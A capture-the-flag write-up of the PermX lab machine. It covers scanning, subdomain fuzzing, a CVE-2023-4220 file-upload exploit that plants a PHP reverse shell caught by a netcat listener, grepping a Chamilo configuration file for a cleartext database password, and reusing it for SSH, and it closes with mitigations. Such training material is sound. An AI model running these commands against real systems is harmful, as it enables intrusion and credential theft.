Table of Contents Link to heading
Reconnaissance Link to heading
T1595.002 - Active Scanning: Vulnerability Scanning Link to heading
Initial Reconnaissance with nmap
Link to heading
-
Objective: Discover active services and versions running on the target.
-
Purpose: Identifying services and their versions helps find potential vulnerabilities.
-
Explanation: The
nmap
scan targets the host to list open ports and reveal detailed service information.Command:
nmap -sC -sV -Pn 10.10.11.23
-
Explanation: The
nmap
command runs a scan on the target’s IP, seeking open ports and available services. It uses flags to:-sC
: Run default Nmap scripts, which test for basic vulnerabilities.-sV
: Identify the version of each detected service.-Pn
: Skip host discovery and treat the target as if it’s online, which can bypass firewall rules that block ping requests.
-
Output:
PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.10 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 256 e2:5c:5d:8c:47:3e:d8:72:f7:b4:80:03:49:86:6d:ef (ECDSA) |_ 256 1f:41:02:8e:6b:17:18:9c:a0:ac:54:23:e9:71:30:17 (ED25519) 80/tcp open http Apache httpd 2.4.52 |_http-title: eLEARNING |_http-server-header: Apache/2.4.52 (Ubuntu)
-
Interpretation:
- Port 22 is open and running OpenSSH 8.9p1, suggesting potential SSH access.
- Port 80 is open and hosts an Apache HTTP server with a page title “eLEARNING,” indicating a web-based application on this port. The server type hints at a specific service that may be exploitable based on known vulnerabilities in Apache or web applications.
T1596.004 - Search Open Websites/Domains Link to heading
Subdomain Enumeration with ffuf
Link to heading
-
Objective: Enumerate subdomains to identify additional web applications or services.
-
Purpose: Discovering subdomains broadens the attack surface by revealing alternative endpoints, which may have weaker security.
-
Explanation: Using
ffuf
with a wordlist to test for responsive subdomains by including a “Host” header with various entries.Command:
ffuf -u http://permx.htb -H "Host: FUZZ.permx.htb" -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -mc 200
-
Explanation:
ffuf
is used to brute-force subdomains by specifying the FUZZ placeholder in the HTTP Host header.-u http://permx.htb
: Specifies the main domain to fuzz.-H "Host: FUZZ.permx.htb"
: Customizes the Host header to test various subdomains.-w
: Specifies a wordlist for subdomain names.-mc 200
: Only show responses with HTTP status 200 (OK), indicating active subdomains.
-
Output:
www [Status: 200, Size: 36182, Words: 12829, Lines: 587, Duration: 22ms] lms [Status: 200, Size: 19347, Words: 4910, Lines: 353, Duration: 49ms]
-
Interpretation:
- The www and lms subdomains were identified as accessible, each returning HTTP status code 200. This suggests two potential points of interest:
www.permx.htb
andlms.permx.htb
, withlms.permx.htb
likely hosting the Chamilo LMS application based on prior observations of the page title.
- The www and lms subdomains were identified as accessible, each returning HTTP status code 200. This suggests two potential points of interest:
Initial Access Link to heading
T1190 - Exploit Public-Facing Application Link to heading
Exploit: CVE-2023-4220 Link to heading
-
Objective: Gain a foothold on the target system by exploiting a vulnerability in the Chamilo LMS.
-
Purpose: CVE-2023-4220 permits unrestricted file uploads, leading to possible remote code execution (RCE) and server compromise.
-
Explanation: Using a publicly available exploit, a PHP reverse shell payload is uploaded to execute commands on the server.
Steps:
-
Prepare Reverse Shell: A PHP reverse shell script from PentestMonkey is used.
-
Start Listener: Begin listening on port 9001.
nc -lvnp 9001
nc
: Netcat utility for listening or connecting over TCP/UDP.-lvnp 9001
: Listen verbosely (v
) on port 9001 and prevent DNS lookups (n
).
-
Run Exploit:
./CVE-2023-4220.sh -f ./shell.php -h http://lms.permx.htb/ -p 9001
-f ./shell.php
: Specifies the shell file to upload.-h http://lms.permx.htb/
: Specifies the LMS subdomain.-p 9001
: Port to establish the reverse shell connection.
-
-
Output:
- Reverse shell connects, providing an interactive shell on the server under the
www-data
user.
- Reverse shell connects, providing an interactive shell on the server under the
-
Interpretation: Successfully exploited the Chamilo LMS application to gain a www-data shell, confirming that CVE-2023-4220 vulnerability exists and is exploitable on this system.
Credential Access Link to heading
T1552.001 - Credentials in Files Link to heading
Accessing Configuration Files for Credentials Link to heading
-
Objective: Extract database and system credentials stored in Chamilo configuration files.
-
Purpose: Configuration files may contain cleartext credentials that allow further access to databases or remote services.
-
Explanation: Chamilo LMS stores settings in
configuration.php
, including database credentials, which can be accessed directly by the www-data user.Command:
grep -E '^[^/]*\$_configuration\[' /var/www/chamilo/app/config/configuration.php
grep -E '^[^/]*\$_configuration\['
: Regular expression search in configuration.php for lines beginning with$_configuration
.- This command lists variables containing sensitive data like usernames and passwords.
-
Output:
$_configuration['db_user'] = 'chamilo'; $_configuration['db_password'] = '03F6lY3uXAP2bkW8';
-
Interpretation: The database username and password were retrieved. If the same credentials are reused for SSH or other services, they can enable further access. Here, the username and password are confirmed as valid SSH credentials for the mtz user.
Lateral Movement Link to heading
T1021.001 - Remote Services: SSH Link to heading
SSH Access with Recovered Credentials Link to heading
-
Objective: Use recovered credentials to log in via SSH and access files on the system as mtz.
-
Purpose: SSH provides a stable and secure connection, allowing for further reconnaissance and data extraction.
-
Explanation: Using the Chamilo database credentials, we attempt an SSH login.
Command:
ssh [email protected]
: Initiates SSH login as **
-
Output:
mtz@permx:~$ ls user.txt
-
Interpretation: Successful login confirms that mtz’s SSH password was reused in Chamilo LMS, granting access to user.txt and verifying control over the mtz account on the system.
Conclusion Link to heading
In this exercise, we exploited the PermX machine by leveraging service enumeration, a known vulnerability, and insecure credential storage. The step-by-step methodology emphasized:
- Service and Subdomain Discovery: Uncovering exposed services, including an LMS vulnerable to RCE.
- Exploitation of Public Vulnerabilities: Using CVE-2023-4220 to gain initial access.
- Credential Harvesting and Reuse: Extracting database credentials from configuration files, then reusing them for SSH access.
Key mitigations include restricting public access to sensitive applications, updating software to patch known vulnerabilities, and enforcing unique passwords across different services.